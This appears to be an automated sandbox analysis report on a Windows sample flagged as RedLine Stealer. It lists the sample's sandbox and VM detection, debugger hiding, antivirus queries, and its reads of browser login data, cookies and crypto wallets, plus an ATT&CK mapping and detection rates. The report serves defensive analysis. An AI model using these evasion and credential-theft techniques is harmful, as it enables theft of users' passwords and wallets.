                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe TID: 6424Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe TID: 3176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWindow / User API: threadDelayed 527Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWindow / User API: threadDelayed 2405Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0012B028 sldt word ptr [eax]15_2_0012B028
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeSystem information queried: ModuleInformationJump to behavior
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpBinary or memory string: VMware
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareEGOO3369Win32_VideoController_T9WFHGGVideoController120060621000000.000000-0004.724058display.infMSBDADA6EFYGRPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE5VS2XYCl
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: vmicvss
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587048785.0000000000956000.00000004.00000020.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587037416.000000000094B000.00000004.00000020.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587007399.00000000008F8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

                        Anti Debugging:

                        barindex
                        Hides threads from debuggersShow sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_72E41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_72E41BFF
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294782B mov eax, dword ptr fs:[00000030h]0_2_0294782B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294907F mov eax, dword ptr fs:[00000030h]0_2_0294907F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294951D mov eax, dword ptr fs:[00000030h]0_2_0294951D
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294A152 mov eax, dword ptr fs:[00000030h]0_2_0294A152
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029486FB LdrInitializeThunk,0_2_029486FB
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.592231521.00000000216FB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587007399.00000000008F8000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210f6e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210f6e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e680000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210086.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e680000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210086.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GR8jRQeRUr.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Tries to steal Crypto Currency WalletsShow sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: Yl1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: Yl-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GR8jRQeRUr.exe PID: 6312, type: MEMORYSTR

                        Remote Access Functionality:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210f6e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210f6e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e680000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210086.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e680000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e210086.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.GR8jRQeRUr.exe.1e490000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: GR8jRQeRUr.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation221Path InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping1Security Software Discovery531Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                        Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection11Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion441Security Account ManagerVirtualization/Sandbox Evasion441SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol111Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery126VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        GR8jRQeRUr.exe13%VirustotalBrowse
                        GR8jRQeRUr.exe16%ReversingLabsWin32.Trojan.Shelsy

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll2%VirustotalBrowse
                        C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll3%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://service.r0%URL Reputationsafe
                        http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id90%URL Reputationsafe
                        http://tempuri.org/Entity/Id80%URL Reputationsafe
                        http://tempuri.org/Entity/Id50%URL Reputationsafe
                        http://tempuri.org/Entity/Id40%URL Reputationsafe
                        http://tempuri.org/Entity/Id70%URL Reputationsafe
                        http://tempuri.org/Entity/Id60%URL Reputationsafe
                        http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                        http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                        http://support.a0%URL Reputationsafe
                        http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                        https://api.ip.sb/ip0%URL Reputationsafe
                        http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id200%URL Reputationsafe
                        http://tempuri.org/Entity/Id210%URL Reputationsafe
                        http://tempuri.org/Entity/Id220%URL Reputationsafe
                        http://tempuri.org/Entity/Id230%URL Reputationsafe
                        http://tempuri.org/Entity/Id240%URL Reputationsafe
                        http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                        http://forms.rea0%URL Reputationsafe
                        http://tempuri.org/Entity/Id100%URL Reputationsafe
                        http://tempuri.org/Entity/Id110%URL Reputationsafe
                        http://tempuri.org/Entity/Id120%URL Reputationsafe
                        http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id130%URL Reputationsafe
                        http://tempuri.org/Entity/Id140%URL Reputationsafe
                        http://tempuri.org/Entity/Id150%URL Reputationsafe
                        http://tempuri.org/Entity/Id160%URL Reputationsafe
                        http://tempuri.org/Entity/Id170%URL Reputationsafe
                        http://tempuri.org/Entity/Id180%URL Reputationsafe
                        http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id190%URL Reputationsafe
                        http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                        http://tempuri.org/Entity/Id8Response0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/02/sc/sctGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabGR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591029105.000000001E96F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590648971.000000001E7EA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590799521.000000001E8AE000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591267383.000000001EAB0000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591318944.000000001EAFB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583560791.000000001F89D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583621640.000000001F90F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591722392.000000001F7DA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583684692.000000001F980000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591648322.000000001F769000.00000004.00000001.sdmpfalse
                              		high
                              http://service.rGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                		high
